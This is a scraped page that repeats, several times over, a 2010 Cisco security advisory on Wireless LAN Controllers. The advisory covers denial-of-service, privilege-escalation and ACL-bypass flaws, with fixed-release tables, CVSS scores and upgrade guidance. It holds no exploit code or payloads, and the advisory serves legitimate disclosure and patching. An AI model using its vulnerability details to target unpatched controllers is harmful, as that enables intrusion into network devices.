|----------+---------------| | | | Vulnerable; | | | 4.1M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.205.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | IKE DoS Vulnerability (CSCta56653) |----------+---------------| | | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | HTTP DoS Vulnerability (CSCtd16938) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.196.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1 M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | Privilege Escalation Vulnerabilities | 4.2M | 4.2.207.54M | | (CSCtc91431, CSCsz66726, and |----------+---------------| | CSCtc93837) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.207.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | ACL Bypass Vulnerabilities (CSCta66931 | | Vulnerable; | | and CSCtf36051) | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | Not | | | | Vulnerable | | |----------+---------------| | | 6.0 | 6.0.199.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | +-------------------------------------------------------------------+ Recommended Releases ~~~~~~~~~~~~~~~~~~~~ The "Recommended Release" table lists the releases which have fixes for all the published vulnerabilities at the time of this Advisory. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" table. +-------------------------------------------------------------------+ | Affected Release | Recommended Release | |----------------------+--------------------------------------------| | 3.2 | 3.2.215.0 | |----------------------+--------------------------------------------| | 4.1 | Vulnerable; Migrate to 4.2 | |----------------------+--------------------------------------------| | 4.1M | Vulnerable; Migrate to 4.2M | |----------------------+--------------------------------------------| | 4.2 | 4.2.209.0 | |----------------------+--------------------------------------------| | 4.2M | 4.2.207.54M | |----------------------+--------------------------------------------| | 5.0 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.1 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.2 | Non FIPS Customers migrate to 6.0 | |----------------------+--------------------------------------------| | 6.0 | 6.0.199.4 | |----------------------+--------------------------------------------| | 7.0 | Not Vulnerable | +-------------------------------------------------------------------+ Note: Cisco WLC Software version 5.2.193.11 is a FIPS certified image. Customers not running FIPS images are recommended to migrate to Cisco WLC software 6.0.199.4 or later. Customers running 4.1M with a mixture of LAP1505/LAP1510 and LAP1522/ LAP1524 units will need to refer to the Mesh and Mainstream Releases on the Controller section of the document Cisco Wireless Mesh Access Points, Design and Deployment Guide, Release 7.0. Workarounds =========== There are no available workarounds to mitigate any of these vulnerabilities. Additional mitigations that can be deployed on Cisco devices in the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20100908-wlc.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of customer service requests. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-September-08 | public | | | | release. | +-----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFMh6MB86n/Gc8U/uARAkAoAJ49gL4UWcPviOVj7qBoEjTA0tLQ4QCfTlem QI2QHDaZGejlgOifWafhaW8= =518m -----END PGP SIGNATURE-----

Cisco Wireless LAN Controller (WLC) software, possibly 4.2 through 6.0, allows remote authenticated users to bypass intended access restrictions and modify the configuration, and possibly obtain administrative privileges, via unspecified vectors, a different vulnerability than CVE-2010-2842 and CVE-2010-2843. This issue is tracked by Cisco Bug ID CSCtc93837. This may lead to a full compromise of the affected device or aid in further attacks. Wireless LAN Controller firmware 4.2 and later are affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20100908-wlc Revision 1.0 For Public Release 2010 September 08 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= The Cisco Wireless LAN Controller (WLC) product family is affected by these vulnerabilities: * Two denial of service (DoS) vulnerabilities * Three privilege escalation vulnerabilities * Two access control list (ACL) bypass vulnerabilities Note: These vulnerabilities are independent of one another. Cisco has released free software updates that address these vulnerabilities. There are no workarounds to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml Affected Products ================= Vulnerable Products +------------------ These products are each affected by at least one vulnerability covered in this Security Advisory: * Cisco 2000 Series WLCs * Cisco 2100 Series WLCs * Cisco 4100 Series WLCs * Cisco 4400 Series WLCs * Cisco 5500 Series WLCs * Cisco Wireless Services Modules (WiSMs) * Cisco WLC Modules for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs DoS Vulnerabilities ~~~~~~~~~~~~~~~~~~~ The Cisco WLC product family is affected by two DoS vulnerabilities: * Internet Key Exchange (IKE) DoS Vulnerability * HTTP DoS Vulnerability The IKE DoS vulnerability affects Cisco WLC software versions 3.2 and later. The HTTP DoS vulnerability affects Cisco WLC software versions 4.2 and later. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The privilege escalation vulnerabilities affect Cisco WLC software versions 4.2 and later. CPU ACL Bypass Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ One of the two ACL bypass vulnerabilities affects Cisco WLC software versions 4.1 and later. The second ACL bypass vulnerability affects Cisco WLC software versions 6.0.x. Determination of Software Versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Administrators can use these instructions to determine the software version that is running on the Cisco WLCs (using the web or command-line interface) or on the Cisco WiSM (using commands on the Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router). Cisco Wireless Controllers ~~~~~~~~~~~~~~~~~~~~~~~~~~ To determine the WLC version that is running in a given environment, use one of these methods: * In the web interface, choose the "Monitor" tab, click "Summary" in the left pane, and note the "Software" Version field. Note: Customers who use a Cisco WLC Module in an ISR will need to issue the "service-module wlan-controller <slot/port> session" command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the "session <Stack-Member-Number> processor 1 session" command prior to performing the next step on the command line. * From the command-line interface, type "show sysinfo" and note the "Product Version" field, as shown in this example: (Cisco Controller)> show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... Cisco Controller Product Version...... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS <output suppressed> Cisco WiSMs ~~~~~~~~~~~ Use the "show wism module <module number> controller 1 status" command on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router if they are using a WiSM. Note the software version as demonstrated in this example, which shows version 5.1.151.0: Router# show wism module 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco WLCs and Cisco WiSMs are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility. The following are the details about these vulnerabilities. IKE Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An attacker with the ability to send a malicious IKE packet to an affected Cisco WLC could cause the device to crash and reload. This vulnerability can be exploited from both wired and wireless segments. Note: IKE is enabled by default in the WLC and cannot be disabled. Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. HTTP Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An authenticated attacker with the ability to send a series of malicious HTTP packets to an affected Cisco WLC could cause the device to reload. This vulnerability can be exploited from both wired and wireless segments. A TCP three-way handshake is needed in order to exploit this vulnerability. Note: Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. WebAuth or guest access is not affected by this vulnerability. After ACLs are defined, they can be applied to the management interface, the access point manager (AP-manager) interface, or any of the dynamic interfaces for client data traffic or to the Network Processing Unit (NPU) interface for traffic to the controller CPU. Two vulnerabilities exist in the Cisco WLCs that could allow an unauthenticated attacker to bypass policies that should be enforced by CPU-based ACLs. No other ACL types are affected by these vulnerabilities. Note: CPU-based ACLs are configured and applied by navigating to Security > Access Control Lists > CPU Access Control Lists in the Cisco WLC web management interface. When CPU-based ACLs are enabled, they are applicable to both wireless and wired traffic. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCta56653 - WLC may reload when receiving crafted IKE packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtd16938 - WLC crash after passing invalid arguments to emweb CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCtc91431, CSCsz66726, and CSCtc93837- Privilege Escalation vulnerabilities CVSS Base Score - 9.0 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.8 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCta66931, CSCtf36051 - CPU ACL bypass vulnerabilities CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the ACL bypass vulnerabilities could allow an attacker to bypass policies that should be enforced by CPU-based ACLs. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. +-------------------------------------------------------------------+ | Vulnerability/Bug ID | Affected | First Fixed | | | Release | Version | |----------------------------------------+----------+---------------| | | 3.2 | 3.2.215.0 | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.205.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | IKE DoS Vulnerability (CSCta56653) |----------+---------------| | | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | HTTP DoS Vulnerability (CSCtd16938) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.196.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | | Vulnerable; | | | 4.1 | Migrate to | | | | 4.2 | | |----------+---------------| | | | Vulnerable; | | | 4.1 M | Migrate to | | | | 4.2M | | |----------+---------------| | | 4.2 | 4.2.209.0 | | |----------+---------------| | Privilege Escalation Vulnerabilities | 4.2M | 4.2.207.54M | | (CSCtc91431, CSCsz66726, and |----------+---------------| | CSCtc93837) | | Vulnerable; | | | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | 5.2.193.11 | | |----------+---------------| | | 6.0 | 6.0.188.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | |----------------------------------------+----------+---------------| | | 3.2 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1 | Not | | | | Vulnerable | | |----------+---------------| | | 4.1M | Not | | | | Vulnerable | | |----------+---------------| | | 4.2 | 4.2.207.0 | | |----------+---------------| | | 4.2M | 4.2.207.54M | | |----------+---------------| | ACL Bypass Vulnerabilities (CSCta66931 | | Vulnerable; | | and CSCtf36051) | 5.0 | Migrate to | | | | 6.0 | | |----------+---------------| | | | Vulnerable; | | | 5.1 | Migrate to | | | | 6.0 | | |----------+---------------| | | 5.2 | Not | | | | Vulnerable | | |----------+---------------| | | 6.0 | 6.0.199.0 | | |----------+---------------| | | 7.0 | Not | | | | Vulnerable | +-------------------------------------------------------------------+ Recommended Releases ~~~~~~~~~~~~~~~~~~~~ The "Recommended Release" table lists the releases which have fixes for all the published vulnerabilities at the time of this Advisory. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" table. +-------------------------------------------------------------------+ | Affected Release | Recommended Release | |----------------------+--------------------------------------------| | 3.2 | 3.2.215.0 | |----------------------+--------------------------------------------| | 4.1 | Vulnerable; Migrate to 4.2 | |----------------------+--------------------------------------------| | 4.1M | Vulnerable; Migrate to 4.2M | |----------------------+--------------------------------------------| | 4.2 | 4.2.209.0 | |----------------------+--------------------------------------------| | 4.2M | 4.2.207.54M | |----------------------+--------------------------------------------| | 5.0 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.1 | Vulnerable; Migrate to 6.0 | |----------------------+--------------------------------------------| | 5.2 | Non FIPS Customers migrate to 6.0 | |----------------------+--------------------------------------------| | 6.0 | 6.0.199.4 | |----------------------+--------------------------------------------| | 7.0 | Not Vulnerable | +-------------------------------------------------------------------+ Note: Cisco WLC Software version 5.2.193.11 is a FIPS certified image. Customers not running FIPS images are recommended to migrate to Cisco WLC software 6.0.199.4 or later. Customers running 4.1M with a mixture of LAP1505/LAP1510 and LAP1522/ LAP1524 units will need to refer to the Mesh and Mainstream Releases on the Controller section of the document Cisco Wireless Mesh Access Points, Design and Deployment Guide, Release 7.0. Workarounds =========== There are no available workarounds to mitigate any of these vulnerabilities. Additional mitigations that can be deployed on Cisco devices in the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20100908-wlc.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of customer service requests. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-September-08 | public | | | | release. | +-----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- iD8DBQFMh6MB86n/Gc8U/uARAkAoAJ49gL4UWcPviOVj7qBoEjTA0tLQ4QCfTlem QI2QHDaZGejlgOifWafhaW8= =518m -----END PGP SIGNATURE-----

Cisco Wireless LAN Controller (WLC) software, possibly 4.2 through 6.0, allows remote authenticated users to bypass intended access restrictions and modify the configuration, and possibly obtain administrative privileges, via unspecified vectors, a different vulnerability than CVE-2010-2842 and CVE-2010-3033. This issue is tracked by Cisco Bug ID CSCsz66726. This may lead to a full compromise of the affected device or aid in further attacks. Wireless LAN Controller firmware 4.2 and later are affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20100908-wlc Revision 1.0 For Public Release 2010 September 08 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= The Cisco Wireless LAN Controller (WLC) product family is affected by these vulnerabilities: * Two denial of service (DoS) vulnerabilities * Three privilege escalation vulnerabilities * Two access control list (ACL) bypass vulnerabilities Note: These vulnerabilities are independent of one another. Cisco has released free software updates that address these vulnerabilities. There are no workarounds to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20100908-wlc.shtml Affected Products ================= Vulnerable Products +------------------ These products are each affected by at least one vulnerability covered in this Security Advisory: * Cisco 2000 Series WLCs * Cisco 2100 Series WLCs * Cisco 4100 Series WLCs * Cisco 4400 Series WLCs * Cisco 5500 Series WLCs * Cisco Wireless Services Modules (WiSMs) * Cisco WLC Modules for Integrated Services Routers (ISRs) * Cisco Catalyst 3750G Integrated WLCs DoS Vulnerabilities ~~~~~~~~~~~~~~~~~~~ The Cisco WLC product family is affected by two DoS vulnerabilities: * Internet Key Exchange (IKE) DoS Vulnerability * HTTP DoS Vulnerability The IKE DoS vulnerability affects Cisco WLC software versions 3.2 and later. The HTTP DoS vulnerability affects Cisco WLC software versions 4.2 and later. Privilege Escalation Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The privilege escalation vulnerabilities affect Cisco WLC software versions 4.2 and later. CPU ACL Bypass Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ One of the two ACL bypass vulnerabilities affects Cisco WLC software versions 4.1 and later. The second ACL bypass vulnerability affects Cisco WLC software versions 6.0.x. Determination of Software Versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Administrators can use these instructions to determine the software version that is running on the Cisco WLCs (using the web or command-line interface) or on the Cisco WiSM (using commands on the Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router). Cisco Wireless Controllers ~~~~~~~~~~~~~~~~~~~~~~~~~~ To determine the WLC version that is running in a given environment, use one of these methods: * In the web interface, choose the "Monitor" tab, click "Summary" in the left pane, and note the "Software" Version field. Note: Customers who use a Cisco WLC Module in an ISR will need to issue the "service-module wlan-controller <slot/port> session" command prior to performing the next step on the command line. Customers who use a Cisco Catalyst 3750G Switch with an integrated WLC Module will need to issue the "session <Stack-Member-Number> processor 1 session" command prior to performing the next step on the command line. * From the command-line interface, type "show sysinfo" and note the "Product Version" field, as shown in this example: (Cisco Controller)> show sysinfo Manufacturer's Name.. Cisco Systems Inc. Product Name......... Cisco Controller Product Version...... 5.1.151.0 RTOS Version......... Linux-2.6.10_mvl401 Bootloader Version... 4.0.207.0 Build Type........... DATA + WPS <output suppressed> Cisco WiSMs ~~~~~~~~~~~ Use the "show wism module <module number> controller 1 status" command on a Cisco Catalyst 6500 Series Switch and Cisco 7600 Series Router if they are using a WiSM. Note the software version as demonstrated in this example, which shows version 5.1.151.0: Router# show wism module 3 controller 1 status WiSM Controller 1 in Slot 3 Operational Status of the Controller : Oper-Up Service VLAN : 192 Service Port : 10 Service Port Mac Address : 0011.92ff.8742 Service IP Address : 192.168.10.1 Management IP Address : 192.168.1.123 Software Version : 5.1.151.0 Port Channel Number : 288 Allowed vlan list : 30,40 Native VLAN ID : 40 WCP Keep Alive Missed : 0 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco WLCs and Cisco WiSMs are responsible for system-wide wireless LAN functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility. The following are the details about these vulnerabilities. IKE Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An attacker with the ability to send a malicious IKE packet to an affected Cisco WLC could cause the device to crash and reload. This vulnerability can be exploited from both wired and wireless segments. Note: IKE is enabled by default in the WLC and cannot be disabled. Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. HTTP Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An authenticated attacker with the ability to send a series of malicious HTTP packets to an affected Cisco WLC could cause the device to reload. This vulnerability can be exploited from both wired and wireless segments. A TCP three-way handshake is needed in order to exploit this vulnerability. Note: Only traffic destined to the Cisco WLC could trigger this vulnerability. Transient traffic will not trigger this vulnerability. WebAuth or guest access is not affected by this vulnerability. After ACLs are defined, they can be applied to the management interface, the access point manager (AP-manager) interface, or any of the dynamic interfaces for client data traffic or to the Network Processing Unit (NPU) interface for traffic to the controller CPU. Two vulnerabilities exist in the Cisco WLCs that could allow an unauthenticated attacker to bypass policies that should be enforced by CPU-based ACLs. No other ACL types are affected by these vulnerabilities. Note: CPU-based ACLs are configured and applied by navigating to Security > Access Control Lists > CPU Access Control Lists in the Cisco WLC web management interface. When CPU-based ACLs are enabled, they are applicable to both wireless and wired traffic. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS 